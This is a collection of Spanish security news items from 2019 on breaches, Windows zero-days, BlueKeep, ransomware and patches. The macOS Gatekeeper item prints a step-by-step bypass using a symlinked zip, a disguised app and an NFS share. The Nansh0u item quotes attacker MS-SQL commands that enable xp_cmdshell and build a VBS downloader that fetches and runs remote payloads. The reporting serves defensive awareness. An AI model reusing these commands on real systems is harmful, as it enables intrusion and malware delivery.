Stack Overflow, uno de los sitios más grandes de preguntas y respuestas para programadores, reveló que unos ciberdelincuentes lograron explotar un error de seguridad gracias a que obtuvieron acceso no autorizado a su versión de producción.

La compañía asegura que los piratas informáticos ejecutaron solicitudes web privilegiadas, pero pudieron obtener acceso únicamente a una parte muy pequeña de los datos, incluida la dirección IP, los nombres y la dirección de correo electrónico.

«Entre el 5 de mayo y el 11 de mayo, el intruso contuvo sus actividades de exploración. El 11 de mayo, el intruso realizó un cambio en nuestro sistema para otorgarse un acceso privilegiado en la producción. Este cambio se identificó rápidamente y revocamos su acceso a toda la red. Comenzamos a investigar la intrusión y se tomaron medidas para remediarla».

«Ahora podemos confirmar que nuestra investigación sugiere que las solicitudes en cuestión afectaron a aproximadamente 250 usuarios de la red pública. Nosotros notificaremos a los usuarios afectados».

Mary Ferguson, vicepresidenta de ingeniería de Stack Overflow

Además, la empresa ha confirmado que el error explotado se encontraba en un cambio recientemente implementado, el cual ya ha sido parcheado.

Más información:
https://techcrunch.com/2019/05/16/stack-overflow-data-breach/

Finalmente, ¡ya hemos abierto la inscripción a los talleres del evento!

Como ya hemos comentado en publicaciones anteriores, el día 7 de junio estará dedicado a talleres de diferente temática. En concreto se abordarán las temáticas: Inteligencia Artificial, Pentesting sobre sistemas Windows y Exploiting.

La inscripción a los diferentes talleres la podéis hacer directamente desde el siguiente enlace.

Es necesario recordar que el taller durará toda la jornada (mañana y tarde), con una parada en medio para comer. Además, aprovechamos la ocasión para comunicaros que el sábado tanto el desayuno como la comida correrán a cargo del evento.

Os facilitamos una pequeña explicación de cada taller para intentar ayudaros a escoger correctamente:

Taller de Inteligencia Artificial:  Se comentará cómo han evolucionado las técnicas de IA y cuáles son los paradigmas de aprendizaje. También se resumirá cuál es el flujo de vida de un proyecto de IA y cómo se dividen cada una de sus fases. Por último, se comentarán diferentes ejemplos de aplicación de la IA. En cuanto a la parte más práctica del taller se verán diversos ejemplos de aplicación sobre el dataset de MNIST y cómo aplicar diferentes aproximaciones para empezar con un ejemplo clásico de clasificación, además de familiarizarse con el framework de TensorFlow desarrollado por Google.

Taller de pentesting sobre sistemas Windows: El taller explicará conceptos básicos sobre pentesting guiados por pruebas reales de explotación sobre una infraestructura de 5 máquinas. El nivel irá subiendo y abordará mañana y tarde del viernes.

Taller de iniciación al exploiting: En el taller se dará una introducción a la explotación de binarios en Linux. Se realizará una breve introducción al lenguaje ensamblador (x86 y x86_64) y a la disposición de memoria, centrándose especialmente en la base necesaria para el desarrollo de exploits (como las convenciones de llamada y retorno de funciones). De modo que, con estos conocimientos básicos, se introduzcan herramientas (GDB, radare2, pwntools) y técnicas habituales (ret2libc, ROP) para la explotación de binarios. Además, se dará un repaso de las medidas de seguridad (ASLR, NX, Stack Canary, PIE) que se han ido añadiendo para dificultar la explotación de vulnerabilidades en binarios, incluyendo escenarios en los que dichas medidas de seguridad no imposibilitan una explotación satisfactoria.

Más información:
Entradas sobre UAD360:
https://unaaldia.hispasec.com/2019/03/una-al-dia-tendra-su-propio-congreso-de-seguridad-informatica-uad360.html
https://unaaldia.hispasec.com/2019/05/uad-360-comienza-la-cuenta-atras.html
https://unaaldia.hispasec.com/2019/05/uad360-agenda-del-evento.html

El Polo Digital de Málaga acogerá los próximos viernes 24 y sábado 25 de mayo la cuarta edición de Opensouthcode, conferencia dedicada a dar difusión, compartir experiencias y conocimientos en el ámbito del software libre, tecnologías abiertas y opensource.

Opensouthcode ya es un cita imprescindible para todos los que de una forma u otra, usan, colaboran y hacen crecer este tipo de tecnologías.

En esta edición se realizarán más de 50 actividades entre charlas, talleres y reuniones de varios grupos relacionados con las tecnologías abiertas, como MálagaScala, MálagaJUG (Java User Group), WordPressMálaga, Linux-Málaga, RubyMálaga, DrupalMálaga, R-Málaga y Wikimedia España .  

Las temáticas de las actividades serán de lo más diversa dentro del mundo tecnológico:  sistemas, machine learning, presentación de proyectos libres, seguridad, desarrollo web, entre otras muchas.

Además, tras el éxito de la pasada edición, el sábado por la mañana se realizará la sección especial para niños: OpensouthKids donde los más pequeños podrán iniciarse en la programación de videojuegos.

El evento es totalmente gratuito previo registro en su web. Más información, programa completo y registro en la web del evento: https://www.opensouthcode.org

Un investigador de seguridad ha publicado un exploit a modo de prueba de concepto para una vulnerabilidad no parcheada en Windows 10.

‘SandboxEscaper’, un investigador anónimo que ha hecho públicas varias vulnerabilidades de seguridad para Windows en los últimos meses (como esta que ya os contamos en Una Al Día), publicó ayer una prueba de concepto para una nueva vulnerabilidad de Windows 10.

Como es habitual en las publicaciones de este investigador, aún no existe ningún parche de seguridad que solucione el fallo, por lo que se recomienda extremar las precauciones al ejecutar ficheros descargados de Internet mientras se lanza el parche de seguridad.

La vulnerabilidad permite elevar privilegios en el sistema, de manera que puede ser utilizada por un atacante o malware que ya tenga acceso al sistema para obtener privilegios de sistema.

La prueba de concepto publicada hace uso de la función ‘SchRpcRegisterTask’, una función del programador de tareas de Windows para programar nuevas tareas en el sistema. El problema se encuentra en el chequeo de permisos, que no se realiza correctamente y permite configurar unos permisos arbitrarios para la tarea.

Gracias a este problema, un programa malicioso podría ejecutar un fichero ‘.job’ que se encargue de registrar un servicio con privilegios de sistema y realice las acciones maliciosas.

La prueba de concepto ha sido publicada en Github: https://github.com/SandboxEscaper/polarbearrepo

Más información:

Fuente: https://thehackernews.com/2019/05/windows-zero-day-vulnerability.html

El grupo español La 9 de Anonymous ha revelado una brecha de seguridad en la web de reservas de La Alhambra de Granada, monumento ubicado en la comunidad de Andalucía y visitado por millones de usuarios al año. No es necesario haber reservado a través de la web para verse expuesto, ya que la misma es utilizada por múltiples agencias de reservas.

La vulnerabilidad, al menos presente desde 2017, consistía en una inyección SQL de manual, que según ha podido confirmar Teknautas se trataría de un fallo de fácil explotación, y probablemente detectable usando herramientas accesibles por todo el mundo con SQLMap y sin demasiados conocimientos de seguridad. Además, la explotación resultaba mucho más sencilla debido a que el servidor no contaba con WAF.

La filtración incluye los datos de 4,5 millones de visitantes, abarcando número de teléfono, DNI, correo electrónico, dirección postal, edad y sexo, entre otros datos. Esta parte de la filtración no incluye contraseñas, al no usar la web login para los visitantes.

La que sí incluye contraseñas es la filtración de los datos de agencias de viajes. Cerca de 1000 agencias han visto sus datos expuestos, incluyendo contraseñas en texto plano, una clara negligencia penable por la Ley de Protección de Datos. Por si fuese poco, también se almacenaban las cuentas corrientes con su IBAN.

Hiberus, la empresa responsable del software comprometido, ha lanzado una nota de prensa intentando quitar gravedad a los hechos. En ella se afirma que se trataría de un «ataque informático profesional y organizado», y ha añadido en un comunicado enviado a El Confidencial que, «a fecha de hoy, cualquier incidente que haya podido ocurrir está resuelto y correctamente gestionado». Sin embargo, hay otras webs del mismo grupo que aún no han corregido el error.

Bien es cierto que otras webs que usan este mismo software, como pueden ser las de los museos de El Prado o el Thyssen, cuentan desde hace tiempo con una versión actualizada que corrige este error. Sin embargo, no se han preocupado de actualizar otras webs más pequeñas, o la de La Alhambra, como se ha revelado con esta filtración.

Tras lo sucedido, queda patente la necesidad de realizar auditorías antes del lanzamiento de una aplicación de este tipo. Porque errores tan graves como almacenar en texto plano las contraseñas, o las cuentas corrientes en la misma base de datos, son fáciles de detectar y solucionar.

Fuente:
Agujero en la web de entradas a la Alhambra: los datos de 4,5 M de visitantes, al descubierto:
https://www.elconfidencial.com/tecnologia/2019-05-22/alhambra-hiberus-sicomoro-patronato-generalife-junta-andalucia_2013846/

Tras hacer pública una vulnerabilidad en Windows 10, la investigadora conocida por el alias «SandboxEscaper» ha liberado más exploits para vulnerabilidades aun sin parchear.

• Vulnerabilidad AngryPolarBearBug2

Esta vulnerabilidad reside en el servicio de reporte de errores de Windows y puede ser explotada usando una operación en la DACL (lista de control de acceso discreccional). Este mecanismo permite o deniega permisos de acceso a un determinado objeto.

En una explotación satisfactoria, un atacante podría editar o borrar cualquier fichero de windows.

Bautizada como AngryPolarBearBug2 por la hacker, esta vulnerabilidad es sucesora de de otra descubierta por la investigadora a finales del pasado año (AngryPolarBearBug).

Sin embargo, según SandboxEscaper, esta vulnerabilidad no es trivial explotarla y puede tomar mas de quince minutos en dispararse, ya que la ventana de tiempo en la que el bug puede ser aprovechado es muy pequeña.

• Internet Explorer 11 Sandbox Bypass

La segunda vulnerabilidad publicada ayer por la investigadora SandboxEscaper afecta a Internet Explorer 11.

Aunque el README del exploit no contiene ningún detalle sobre esta vulnerabilidad, un video subido por la investigadora muestra como el bug existe debido a un error del navegador a la hora de manejar una DLL maliciosa.

Esto permitiría a un atacante saltarse el sandbox del navegador y ejecutar código arbitrario con permisos de integridad medios.

A pesar de que las vulnerabilidades publicadas no son críticas, es de esperar que Microsoft libere actualizaciones el próximo 11 de Junio.

SandboxEscaper (¿Thomas Vanhoutte?) tiene un amplio historial de liberar pruebas de concepto perfectamente funcionales para el sistema operativo Windows. El pasado agosto publicó otra vulnerabilidad en el programador de tareas de Windows en su cuenta de twitter, que fue bastante aprovechada por los hackers en su momento.

Podemos esperar mas exploits en los próximos días, pues la investigadora ha prometido hacerlos públicos.

Más información

Zero-Day: Internet Explorer 11 Sandbox Bypass
https://www.youtube.com/watch?v=vgDt4CrmoRI

Github angrypolarbearbug2
https://github.com/SandboxEscaper/polarbearrepo/tree/master/angrypolarbearbug2

Giuthub sandboxescape
https://github.com/SandboxEscaper/polarbearrepo/tree/master/sandboxescape

Canva es un sitio web de herramientas de diseño gráfico y composición de imágenes, fundado en 2012, que facilita tanto a profesionales como a usuarios sin conocimientos de diseño la creación de contenidos utilizando el formato de arrastrar y soltar y proporcionando acceso a más de un millón de fotografías, gráficos y fuentes. Canva es una herramienta online, accesible desde dispositivos con navegadores completos. El sitio web de Canva se ha convertido en uno de los favoritos para crear sitios web rápidos, diseñar logotipos o campañas de marketing llamativas, etc.

Una brecha de seguridad no revelada en los servidores de Canva fue aprovechada para copiar las bases de datos de la empresa. La autoría de estos hechos ha sido reclamada por un pirata informático bajo el nickname ‘GnosticPlayers’, quien asevera haberse hecho con los datos de un total de aproximadamente 139 millones de usuarios durante la intrusión.

Según declaraciones realizadas por el propio pirata a Catalin Cimpanu de ZDNet, la intrusión tuvo lugar el viernes 24 de mayo por la mañana y habría conseguido descargar datos desde el 17 de mayo antes de que la empresa detectase la violación de seguridad y reaccionase cortando el acceso al servidor de bases de datos.

Los datos robados incluirían información de caracter personal y privado como nombres de usuarios, nombres reales, direcciones de correo electrónico, e información de residencia entre otros. También se han obtenido los hashes de las contraseñas de casi 61 millones de usuarios, aunque estos utilizan el algoritmo bcrypt que es considerado actualmente como uno de los más seguros. Para otros usuarios, la información robada contendría los tokens de Google utilizados para registrarse en el sitio sin establecer una contraseña.

Además, ZDNet ha tenido acceso a una muestra de los datos robados (18.816 cuentas, incluyendo a empleados y administradores de Canva) para contrastar la información proporcionada por el autor de los hechos y corroborar la veracidad de los mismos. Según declaraciones de Canva la compañía fue informada de una violación de seguridad que permitía el acceso a varios nombres de usuario y direcciones de correo electrónico y ya estaban alentando a sus usuarios a cambiar sus contraseñas como medida de precaución.

Este no se presenta como un ataque aislado por parte de GnosticPlayers, quien, desde el pasado mes de febrero, ha puesto a la venta en la Deep Web datos pertenecientes a 932 millones de usuarios provenientes de 44 empresas de todo el mundo, obtenidos aprovechando brechas de seguridad. Por lo que se puede presumir que los datos obtenidos de Canva seguirán el mismo destino.

Recientemente Canva adquirió dos de los sitios de contenido de stock gratuito más grandes del mundo: Pexels y Pixabay, sin embargo los datos correspondientes a los usuarios de estos dos sitios no se habrían visto comprometidos.

En cualquier caso, desde Hispasec recomendamos cambiar la contraseña a los usuarios de Canva y, si se ha reutilizado la misma contraseña para otros sitios web o servicios online modificarla también en ellos y usar una contraseña diferente para cada sitio.

Más información:
Australian tech unicorn Canva suffers security breach
https://www.zdnet.com/article/australian-tech-unicorn-canva-suffers-security-breach/

A partir de la información que exponen los sensores de nuestros dispositivos es posible realizar una identificación única entre todos los demás dispositivos, dejando un rastro de lo que visitamos en Internet. Este identificador único nunca cambia, incluso después de restaurar los valores de fábrica en el terminal.

Como ya sabemos, al acceder a una página web, el navegador expone información del dispositivo, como el nombre y versión del navegador, tamaño de la pantalla, fuentes instaladas, etc. Esta información sirve para crear una mejor experiencia para el usuario, aunque también puede ser utilizada para rastrearlo. Saber si estás de vuelta en una misma página o cuales son tus acciones en Internet, permitiendo, entre otros, a los anunciantes generar un perfil de usuario y, por lo tanto, una visión más específica de sus intereses personales.

Investigadores de la Universidad de Cambridge han desarrollado un nuevo ataque denominado Calibration fingerprinting attack o SensorID. Utilizan información recogida del acelerómetro, giroscopio y magnetómetro para generar una identificación única a nivel global del dispositivo. Este ataque afecta a los dispositivos iOS más que a Android puesto que Apple calibra los sensores en la línea de fábrica para mejorar la precisión de los sensores, cosa que pocos proveedores de Android hacen.

Esta identificación tiene las siguientes características:

• Puede ser generada por cualquier app o sitio web que se visite, sin confirmación por parte del usuario.
• Se tarda menos de un segundo en generar este ID.
• El ID generado nunca cambia, incluso al restablecer el terminal.
• Este ataque provee una forma efectiva de rastrear un dispositivo y navegador en Internet.

En respuesta a este fallo Apple ha añadido ruido en el output de ADC para que el identificador que se genera sea aleatorio y no se repita. Además, ha eliminado el acceso a la información de los sensores por defecto desde Mobile Safary en su actualización iOS 12.2.

Este fallo a nivel de privacidad ha sido identificado como CVE-2019-8541.

Más información:

ieee-security.org
https://www.ieee-security.org/TC/SP2019/papers/405.pdf

University of Cambridge
https://sensorid.cl.cam.ac.uk/

Versiones de MacOS X anteriores a la 10.14.5 permitirían saltar las restricciones impuestas por Gatekeeper y ejecutar código no confiable sin necesidad de establecer permisos adicionales o notificar al usuario.

Gatekeeper es un mecanismo desarrollado por Apple e incluido en su sistema operativo para dispositivos de escritorio. Gatekeeper garantiza la verificación de aplicaciones descargadas desde terceros y obliga a los desarrolladores a firmar el código, evitando así que aplicaciones potencialmente fraudulentas se ejecuten sin el consentimiento del usuario.

El investigador de seguridad Filippo Cavallarin ha publicado en su página web una prueba de concepto en la que hace una demostración de una vulnerabilidad que permitiría a un atacante saltar esta protección y ejecutar código no verificado.

En su diseño, Gatekeeper considera las unidades externas y las redes compartidas como direcciones seguras y permite la ejecución de cualquier aplicación contenida en ellas. De forma legítima, Gatekeeper implementa dos características que combinadas, permitirían configurar el ataque: el auto-montado de carpetas en red y la posibilidad de que ficheros zip contengan enlaces simbólicos que apunten a direcciones arbitrarias.

Así, se podría pensar el siguiente escenario: un atacante elabora un fichero zip que contiene un enlace simbólico a una dirección controlada por el atacante, por ejemplo: Documents -> /net/atacante.com/Documents y lo envía a la víctima.

De esta forma, se ejecutaría el archivo en control del atacante, sin que Gatekeeper lo impida ni tan siquiera lo notifique.

De forma detallada, Filippo Cavallarin lo explica en la PoC publicada en su web:

1. Creación de fichero zip con el enlace simbólico
   • mkdir Documents
   • ln -s /net/linux-vm.local/nfs/Documents Documents/Documents
   • zip -ry Documents.zip Documents
2. Creación de la aplicación con el código a ejecutar
   • cp -r /Applications/Calculator.app PDF.app
   • echo -e ‘#!/bin/bash'»\n»‘open /Applications/iTunes.app’ > PDF.app/Contents/MacOS/Calculator
   • chmod +x PDF.app/Contents/MacOS/Calculator
   • rm PDF.app/Contents/Resources/AppIcon.icns
   • ln -s /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/GenericFolderIcon.icns PDF.app/Contents/Resources/AppIcon.icns
3. Creación de la carpeta de red donde irá la aplicación
   • ssh linux-vm.local
   • mkdir -p /nfs/Documents
   • echo ‘/nfs/Documents *(insecure,rw,no_root_squash,anonuid=1000,anongid=1000,async,nohide)’ >> /etc/exports
   • service nfs-kernel-server restart
   • scp -r mymac.local:PDF.app /nfs/Documents/
4. Alojamos el archivo zip en alguna localización remota, para que al descargarlo Gatekeeper lo ponga en «cuarentena».
5. A pesar de que Gatekeeper ha marcado el archivo para su comprobación, no se generará ninguna alerta y se ejecutará el código controlado por el atacante.

El fallo fue notificado el 22 de febrero de este año, sin embargo Apple todavía no ha publicado ningún parche oficial.

Más información:

MacOS X GateKeeper Bypass
https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass

Se ha publicado la noticia de una filtración de más de 200.000 registros en una empresa de planificación de eventos.

El investigador de seguridad Jeremiah Fowler de la empresa Security Discovery fue quién en un trabajo de investigación dio con una base de datos ElasticSearch en la nube sin ninguna protección de seguridad.

La investigación confirmó que los datos pertenecía a una empresa Australiana llamada Amazingco, la cual no solo opera en Australia, sino que también opera en Nueva Zelanda y Estados Unidos, y los servicios que ofrece es la de conectar a clientes con empresas de planificación de eventos de entretenimiento, como fiestas infantiles, picnics o tours de vinos.

En la base de datos encontrada, con más de 200000 registros, unos 174.000 eran de la tabla ‘clientes’, la cual contenía todo tipo de datos privados: nombres, correos electrónicos, números de teléfonos e incluso anotaciones que la empresa hizo sobre los cliente en los eventos que estos mantuvieron.

Jeremiah Fowler descrubrió esta base de datos el día 11 de mayo y notificó a Amazingco dos días después. Actualmente la base de datos sí está protegida aunque la empresa no ha dicho nada al respecto. Se estipula que los datos estuvieron desprotegidos sobre una semana, tiempo más que suficiente para que ciberdelincuentes se hicieran con esta información.

Esto no es más que otro ejemplo de los muchos de los que nos rodeamos en nuestro día a día: Recientemente hemos tenido bases de datos con un millón de datos de la aplicación ‘Game Golf’, con 4.9 millones de registro con datos médicos o el caso de las contraseñas empresariales almacenadas en texto plano por Google.

Más información:

Publicación de Security Discovery.
https://securitydiscovery.com/amazingco/

Millions of Golfers Land in Privacy Hazard After Cloud Misconfig
https://threatpost.com/golfers-privacy-hazard-game-golf/144918/

Millions of Medical Documents for Addiction and Recovery Patients Leaked
https://threatpost.com/medical-documents-addiction-patients-leaked/143993/

Google almacenó contraseñas en texto plano desde 2005
https://www.genbeta.com/seguridad/google-almaceno-contrasenas-texto-plano-2005

El ayuntamiento de Baltimore ha sido el último de una lista de corporaciones locales que incluye a los ayuntamientos de Pensilvania o Texas, entre otros, en sufrir ataques informáticos graves que paralizaron algunas infraestructuras críticas de la ciudad.

A pesar de que el código del exploit fue conocido hace ya más de dos años a raíz de una filtración y de que Microsoft liberó las pertinentes actualizaciones de seguridad, aún existe una ingente cantidad de sistemas desactualizados en las administraciones. En el caso de Baltimore, ciudad que sólo destinaba un 2,5% de su presupuesto a ciberseguridad, los ataques han afectado a áreas tan diversas como las alertas de salud, facturación del agua, servicios de correo electrónico o ventas públicas, pagos de multas y comunicación del ayuntamiento con proveedores.

Es necesario recordar que fue la NSA quien, supuestamente, retuvo durante años el código del exploit sin avisar tan siquiera al proveedor de servicios afectado, Microsoft. Sólo cuando detectaron el robo de información se vieron obligados a reportar la incidencia a Microsoft. Sin embargo, la NSA jamás ha comparecido para aclarar lo sucedido de manera pública.

Un hecho diferenciador con respecto a otros ataques es el empleo de las propias herramientas de la NSA contra infraestructuras estadounidenses así como las reacciones despertadas en las corporaciones locales. Los responsables de los ayuntamientos han exigido información y medios a interlocutores del FBI y la NSA, quienes se niegan a comentar el asunto, provocando un conflicto entre distintos niveles de las administraciones.

La realidad es que, actualmente, existen más de un millón de equipos desactualizados que mantienen el puerto 445, objeto del ataque, expuesto a todo internet. La mayoría de esos sistemas se encuentran además en Estados Unidos.

Dos años después, EternalBlue sigue operando como vector fundamental de distintos ataques informáticos. En el caso de Baltimore, fue un empleado público quien, víctima de un ataque de phishing, infectó el equipo con ‘RobbinHood‘ una variante nueva de ransomware que hace uso de EternalBlue. Lo que revela, fundamentalmente, dos aspectos del estado de la ciberseguridad actual.

En primer lugar, los ataques por ingeniería social, que involucran la explotación de las vulnerabilidades relacionadas con el factor humano, siguen siendo una de las superficies de exposición preferidas por los criminales. Lo que indica, a su vez, una deficiente formación de la población en materia de seguridad informática.

En segundo lugar, el éxito de ataques que hacen uso de EternalBlue, indica, en última instancia, la existencia de un parque de infraestructuras informáticas altamente desactualizadas. Un hecho que guarda relación directa con la dotación presupuestaria de las administraciones destinada a ciberseguridad.

Más información:

Baltimore ransomware attack: NSA faces questions
https://www.bbc.com/news/technology-48423954?intlink_from_url=https://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security&link_location=live-reporting-story

Eternally Blue: Baltimore City leaders blame NSA for ransomware attack
https://arstechnica.com/information-technology/2019/05/eternally-blue-baltimore-city-leaders-blame-nsa-for-ransomware-attack/

Hackers Are Holding Baltimore Hostage: How They Struck and What’s Next
https://www.nytimes.com/2019/05/22/us/baltimore-ransomware.html?module=inline

Un grupo de atacantes de origen desconocido habría tenido acceso a la base de datos de las cuentas de usuario de Flipboard, un conocido y popular agregador de noticias empleado por 150 millones de personas.

Los atacantes habrían tenido acceso durante cerca de 10 meses, en un periodo que comprende desde el 2 de junio de 2018 hasta el 23 de marzo de este año. Aunque se presupone que los atacantes han podido descargar la base de datos, se desconoce el uso que se le ha dado.

Los datos comprenden información personal como el nombre real de la persona, su nombre de usuario, dirección de email, hash de la contraseña usando sal y token para su uso en redes sociales externas. En un principio las contraseñas deberían ser bastante difíciles de romper gracias al uso de la función de hash bcrypt, lo que dificulta los ataques por fuerza bruta e impide emplear bases de datos de hashes conocidos.

Desde Flipboard ya han adoptado medidas ante este ataque como reestablecer las contraseñas de sus usuarios y los tokens para conectar en redes sociales externas, lo que significa que los usuarios tendrán que conectarlas de nuevo. No hay evidencias de que los tokens hayan sido empleados por los atacantes.

Al no almacenar Flipboard datos sensibles como números de teléfono o tarjetas de crédito se ha limitado el impacto que la intrusión haya podido tener, lo cual sumado al uso de una función de hash segura se reduce la utilidad de la filtración.

Fuente:
Notice of Security Incident:
https://about.flipboard.com/support-information-incident-May-2019/

Casi un millón de sistemas Windows continúan aun sin parchear y vulnerables a un ataque contra el protocolo RDP (Remote Desktop Service) dos semanas después de que Microsoft libere el parche.

Si se llegase a explotar masivamente, esta vulnerabilidad podría causar estragos en todo el mundo, potencialmente mucho peor que lo ya ocurrido con WannaCry y NotPetya en 2017.

La vulnerabilidad ha sido bautizada como BlueKeep, con identificador CVE-2019-0708, afecta a Windows 2003, XP, Windows 7, Windows Server 2008 y 2008 R2 y podría propagar automáticamente en sistemas sin parchear.

La vulnerabilidad podría permitir a un atacante remoto sin autenticación ejecutar código arbitrario con sólo enviar una solicitud malformada al servidor RDP, sin necesidad de intervención por parte del usuario.

Según el último escaneo global que llevó a cabo el investigador Robert Graham, jefe de la firma de seguridad Errata Security, reveló que, alrededor de 950.000 máquinas públicamente accesibles desde Internet son aun vulnerables a BlueKeep.

Este hecho pone en riesgo a muchas organizaciones e individuales, que a pesar de que el parche está liberado, aun no se han tomado medidas en muchas organizaciones.

Graham usó rdpscan, un escaner desarrollado encima del rastreador de puertos masscan, que puede escanear Internet al completo en busca de la vulnerabilidad BlueKeep. Se encontraron alrededor de 7 millones de sistemas con el puerto 3389 a la escucha, de los cuales casi un millón son todavía vulnerables.

Como la vulnerabilidad BlueKeep tiene bastante potencial para causar estragos en todo el mundo, Microsoft se ha visto obligada a liberar parches también para sus ya descontinuadas versiones de Windows XP, Vista y Windows Server 2003, que aun siguen siendo usados.

Afortunadamente, de momento ningún investigador ha publicado ninguna prueba de concepto que se aproveche de BlueKeep, aunque algunos de ellos han confirmado que han desarrollado una muestra funcional.

Más Información:

Almost One Million Vulnerable to BlueKeep Vuln (CVE-2019-0708)
https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html

Nearly 1 Million Computers Still Vulnerable to «Wormable» BlueKeep RDP Flaw
https://thehackernews.com/2019/05/bluekeep-rdp-vulnerability.html

Investigadores del Guardicore Labs publicaron el pasado 29 de mayo un amplio informe detallando una campaña de cryptojacking que atacaba a servidores MS-SQL (Windows) y PHPMyAdmin. Esta campaña fue seguida por Guardicore Labs en los meses de abril y mayo.

Esta campaña maliciosa ha sido bautizada como Nansh0u, una campaña realizada por cibercriminales chinos que consiguieron infectar cerca de 50.000 servidores. Una vez que los servidores eran comprometidos, se infectaron con payloads maliciosos y éstos a su vez, utilizaron un crypto-miner e instalaron un sofisticado rootkit de modo kernel para evitar de esta manera que el malware finalice y asegurando una persistencia en el equipo infectado.

Esta campaña no es un típico crypto-miner. Nansh0u lo que utiliza son técnicas que se ven a menudo en APTs, como certificados falsos y explotaciones de escalada de privilegios. El problema reside que para ataques de este tipo, existe un gran arsenal de herramientas que pueden caer en malas manos y provocar daños mayores.

A principios de abril, Guardicore detectó y se centró en tres ataques de los que encontró que tenían una IP ubicada en Sudáfrica . Una vez visto esto, siguieron buscando y encontraron nuevas campañas datadas en febrero, elevando el número de payloads maliciosos detectados a 20. Este es el timeline de la campaña.

Este timeline, combinado con un conjunto de 5 ataques y 6 conexiones inversas a los distintos servidores ya mencionados, sugieren que este proceso ha sido establecido por un proceso de desarrollo continuo el cual fue debidamente pensado por los cibercriminales.

Gracias a esta investigación, Guardicore demuestra el crecimiento exponencial del número de infecciones, llegando al doble de infecciones en tan sólo un mes.

Cada ataque realizado comenzó con una serie de intentos de autenticación con ataques de fuerza bruta a servidores MS-SQL, llegando a obtener acceso a cuentas con privilegios de administrador. Esto es ocasionado por una mala política de contraseña. permitiendo contraseñas por defecto o débiles.

Tras obtener acceso, se ejecutaron una serie de comandos MS-SQL que permitían, entre otras cosas, configurar los ajustes de los servidores, crear un script Visual-Basic en c:\ProgramData\1.vbs, ejecutar este script y descargar dos archivos via HTTP y finalmente correr ambos archivos.

"
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 
1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed 
Queries',1;RECONFIGURE;
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation 
Procedures
',1;RECONFIGURE


exec xp_cmdshell 'echo on error resume next >c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo with wscript:if .arguments.count^<2 then .quit:end if >>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") 
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then quit 
>>c:\ProgramData\2.vbs'
exec xp_cmdshell 'echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile 
.arguments(1),2:end with >>c:\ProgramData\2.vbs'


exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'
exec xp_cmdshell 'cscript c:\ProgramData\2.vbs / c:\ProgramData\'


exec xp_cmdshell 'c:\ProgramData\ c:\ProgramData\'
"

Los investigadores también elaboraron una lista completa de IoCs que publicaron en su Github y un script en Powershell que también hicieron público.

Como toda esta campaña comienza con una serie de intentos de accesos combinando usuarios y contraseñas por defecto o débiles para posteriormente proceder-como se ha comentado- a la infección de los distintos servidores; desde Hispasec recomendamos utilizar contraseñas robustas, que se cambien periódicamente y con 2FA para minimizar los daños de este y otros ataques.

Más información

Guardicore – The Nansh0u Campaign – Hackers Arsenal Grows Stronger
https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/

Criminales roban datos de tarjetas de crédito de 103 restaurantes «Checkers» y «Rally’s»

La cadena de restaurantes «Checkers» y «Rally’s» ha descubierto en los últimos días que unos criminales han accedido a los datos de tarjetas de crédito de sus clientes que almacenaban en sus puntos de venta.

Según la famosa cadena de restaurantes, han descubierto un malware especialmente diseñado para robar datos de tarjetas de crédito en 103 de sus restaurantes. Según la investigación, los criminales no han obtenido otros datos de sus clientes más allá de los datos de sus tarjetas de crédito. Además, no todos los clientes de estos 103 restaurantes han sido afectados, los atacantes han obtenido los datos de una parte de los clientes.

Por el momento no se conoce la forma en la que los atacantes consiguieron instalar el software malicioso en los puntos de venta de los restaurantes. Uno de estos puntos de venta ha estado infectado por el malware desde diciembre de 2015, y ha estado capturando datos de tarjetas de crédito hasta marzo de 2018.

La compañía afirma que ha estado colaborando con las autoridades y con las compañías de tarjetas de crédito para detectar posibles usos fraudulentos de las tarjetas y detectar infecciones de malware en otros puntos de venta.

Por parte de la compañía, se recomienda a los clientes que revisen sus cuentas y los movimientos realizados con las tarjetas de crédito.

Más información:

Hackers Stole Customers’ Credit Cards from 103 Checkers and Rally’s Restaurants
https://thehackernews.com/2019/05/credit-card-checkers-restaurants.html

El equipo de Django ha publicado una actualización de seguridad que corrige una vulnerabilidad en el componente ‘AdminURLFieldWidget’ del admin. Este componente es utilizado para la construcción de los campos url de los formularios del modo edición.

La vulnerabilidad identificada como CVE-2019-12308 consiste en la falta de validación de la url introducida en dicho campo, la cual permitiría la explotación de un ataque XSS. Un atacante podría introducir una URL maliciosa a través de este campo u otro vulnerable del sitio web para que se renderice el enlace con el XSS.

Para su explotación se requiere que un usuario que pertenezca al staff (es decir, con acceso al admin) acceda a la edición del registro con la URL maliciosa y haga clic en el enlace adjunto al campo. Con el parche incluido, ahora el campo verifica si la URL es maliciosa al validar el formulario, e impide el renderizado de las URL sospechosas ya existentes.

Las versiones de Django que han recibido este parche de seguridad son la 2.2.2, la 2.1.9 y la 1.11.21. La versión 2.0.x no ha recibido este parche al haber terminado su soporte en abril de este año. La versión 1.11.x seguirá recibiendo este y otros parches de seguridad hasta abril del año que viene al ser una LTS, debiendo el resto de versiones afectadas actualizar o aplicar el parche por su cuenta.

Además, esta actualización de seguridad corrige la vulnerabilidad CVE-2019-11358 en jQuery que afectaba al método ‘jQuery.extend’, el cual no estaba en uso pero podría utilizarse más adelante, o podría estar usándose por módulos de terceros.

Fuente:
Django security releases issued: 2.2.2, 2.1.9 and 1.11.21:
https://www.djangoproject.com/weblog/2019/jun/03/security-releases/

